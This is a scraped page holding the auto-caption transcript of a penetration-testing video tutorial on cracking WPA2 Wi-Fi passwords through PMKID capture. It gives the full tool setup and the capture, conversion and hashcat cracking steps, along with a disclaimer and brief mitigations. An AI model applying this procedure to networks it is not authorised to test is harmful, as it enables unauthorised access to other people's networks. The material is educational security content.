How To Hack WPA2 WIFI with PMKID Method - Are You Safe

Video Statistics and Information

Video
Captions Word Cloud
Reddit Comments
Captions
Wi-Fi attack techniques in the past have always been quite a bit noisy and susceptible to detection however there's a more recent technique that is almost completely silent which you all your clients might be vulnerable to today we'll demonstrate just how this attack works [Music] hi and welcome to the channel if you're new here please consider subscribing and ringing the bell so you don't miss any future video now to start with an obvious disclaimer that this should only be performed on networks that either you own or that you are consulted contracted to test this video is aimed at sharing knowledge to help secure the networks of yourself and your clients and it should not be used for any malicious activity whatsoever this is considered illegal now this method works by leveraging a component that is broadcasted within many Wi-Fi networks and this is the pmk ID this is broadcasted by many modern Wi-Fi access points and if captured a password hash can actually be extracted and then cracked unlike other methods this does not try to force your way in or drop people's existing connection from their Network this requires very little steps to actually do but it does require a fair amount of setup so if you'd like to skip the setup and just see it in action feel free to jump to that in the chapter sections Below in the description so now on to what you need sorry for this exercise you will need the following you'll need a machine running Kelly Linux either virtualized or a host it's fine you'll need a alpha Wi-Fi adapter or something similar the one I use is the aew u s u three five NH and this is a pretty standard in ethical hackers toolkit and lastly you will need a Wi-Fi access point that broadcast WPA2 and the also broadcaster pmk IDs there isn't a great way of checking if it does less so it does require a bit of trial and error but I'd say the majority of them should be doing this by default so let's go into the tools and dependencies that we'll need to set this up so we have a fair bit of setup in the virtual machine to do and this will be based off the Kali Linux 2020.4 build first we need to install the Wi-Fi drivers for our Alpha as these may not already be installed we do this with the APT install firmware Ray Link Wireless tools all these commands will be in the description next we need to install three dependencies for the hcx tools that we'll be using first this is lib ssl--dev then we have package config pgk-config and then live for curl open ssl1- Dev this will all these again will be in the description now we need to install hcx tools which we'll do most of the work for us this is divided into two separate git repos first we have hcx tools and we have hcx dump tool first we clone it from git so go so browse to a folder where you want to install it go get clone and then this URL and then CD into that directory once it's cloned and then do the make Command followed by make install this will compile the application and then install it to your Kali Linux virtual machine we then do the same for the hcx dump tool so we CD out of that and then install the hcx dump tool we CD into that new directory and issue the make Command followed by make install now you'll also need hashcad but this should be installed in your Kali Linux VM by default anyway now everything is installed we want to check everything is working plug in your Wi-Fi adapter and make sure it connects to your VM as a guest and not a host then type ifconfig to see if your adapter is there this should be called wlan0 or wln1 make sure that you're using the correct Wi-Fi adapter if you have multiple installed on your machine now all your prerequisites should be complete and we're ready to get started so now onto the attack and this attack is quite simple and can be broken down into three main steps first we need the Wi-Fi adapter to be set to monitor mode then we tell the Wi-Fi adapter to capture all the Wi-Fi signals around us and actually save that to a file then we convert the file into a file that's compatible with hashcat which will be the password cracking tool that we'll use in this demonstration Step 1 setting the adapter to monitor mode okay so let's get started we'll start by setting our adapter into monitor mode with Ammon NG space start space w Lan zero keep in mind wlan0 is my device and it may be named something else on your machine be sure to check with ifconfig now after we've run that command if we do ifconfig again we can see the adapter is now named wlan0 mon step two capturing now our adapter is configured correctly we need to get it to capture all the Wi-Fi signals around it and install them into a file we do this with the hcx dump tool with the following command HDX dump tool iwlan zerimon which is our interface Dash o test1.p cap NG which is our output file and then dash dash enable status equals one which will just display a verbose message to the screen so we can see what happens now we can leave lists for about five to ten minutes step 3 converting and cracking I like to keep lists running in the background just in case and I set up a new tab and this is what I'll use to convert the file this time we do hcxp cap NG tool with the following command hdxp cap NG tool Dash o being our output of test1.text and then test1.pcap NG which is our import file which was all the packets that we just captured now we need to tidy up this output file with a text editor and remove the networks that don't belong to us first we need to find the network that belongs to us and remove all the others we do this by getting the last block between the two stars and converting that from ASCII hex to plain text you can do this in the command line but I find it quicker just using a web tool once we have our Target network name we remove all the other lines from this file and we also tidy It Up by removing the star01 star WPA star from the start and Triple Star from the end of your line now we're ready to crack the password hash using hashcat you can do this on your Windows host if you prefer and if you want it to run quicker but to keep things simple we'll just do it here on Kelly our Command is hashcat m16800 which is a hash type test1.txt which is our input file and we also give it the rocky word list the other options are just there to configure how hashcat runs on your machine if you don't know just copy leads for yourself you can also set up hashcat to do a pure Brute Force attack or use rules if you prefer just consult the hashcat documentation to do so this might take a while depending on your hash rate but after a while we can see the password hash has been cracked in our case it's I love Sydney which is true firstly I will just disconnect this Wi-Fi adapter from my virtual machine as I don't have another Wi-Fi adapter on this machine next I'll go into the standard Windows networking dialog and connect to the network we type in the password I love Sydney and we're good to go so how can we mitigate this attack well fortunately it is pretty simple and kind of an obvious fix first we need to use strong passwords that aren't susceptible to dictionary attacks or a considerable amount of root forcing also if your router supports it we may be able to disable the broadcast of the pnk IDS and this is usually done by disabling the 802.11 protocol within the access points firmware so wrapping up we can see that this attack is relatively simple and while it may be complicated the first time you go through this process especially with the setup it does become quite an effortless attack and one that you can use on your pen test engagements of course if you have permission anyway if you found this video helpful be sure to leave it a like as it helps people like you find content like this so how did you go with this technique are you having trouble be sure to let me know in the comments below and we may be able to see if we can sort things out also if you had any success with it let me know as well anyways I've been Jason from Jason SEC thank you for watching and I'll catch you in the next one
Info
Channel: Jason Ford {JSON:SEC}
Views: 28,393
Rating: undefined out of 5
Keywords: hacking, ethical hacking, cracking, wifi, wi-fi, wireless, wifi hacking, wpa hacking, wpa cracking, wpa, wpa2 hacking, wpa2 cracking, fake ap, honeypot, evil twin, mana, mana-toolkit, aircrack-ng, kali, linux, kali linux, zsecurity, fake access point, access point
Id: CfjEqqFmfY4
Channel Id: undefined
Length: 10min 1sec (601 seconds)
Published: Mon Jan 18 2021
Related Videos
Cracking WiFi WPA2 Handshake
David Bombal
1.9M
let's hack your home network // FREE CCNA // EP 9
NetworkChuck
3.7M
How to HACK Website Login Pages | Brute Forcing with Hydra
CertBros
1.2M
Enhance WPA & WPA2 Cracking With OSINT + HashCat!
zSecurity
100K
Introduction to Hashcat
13Cubed
188K
How To Crack WPA2 WiFi Password With AirCrack-NG - WiFi Pentesting Video 2023
InfoSec Pat
600K
How Hackers Hack CCTV Cameras
zSecurity
668K
Exposing Netgear WiFi Routers Vulnerability!
Maythom
11K
How To Hack IoT Cameras - Vulnerability Demonstration
Jason Ford {JSON:SEC}
170K
The Dark Side of Wireless Networks: Intro to Wi-Fi Hacking - Megi Bashi - Ryan Dinnan
BSides Prishtina
186K
How Hackers Move Through Networks (with Ligolo)
John Hammond
247K
Pro Hacker Demonstrates hacking other devices in Free Public Wi-Fis
Loi Liang Yang
106K
Kali NetHunter WiFi Hacking
David Bombal
22M
find social media accounts with Sherlock (in 5 MIN)
NetworkChuck
4.1M
Remotely Control Any Phone and PC with this Free tool!
Loi Liang Yang
654K
Track Phone & Computers on The Internet 🌎
zSecurity
1.8M
Learn WIRESHARK in 6 MINUTES!
An0n Ali
73K
Hacking a WiFi Network with Dictionary and Brute Force Attacks Using Kali Linux
Jean AL
1.8K
Note
Please note that this website is currently a work in progress! Lots of interesting data and statistics to come.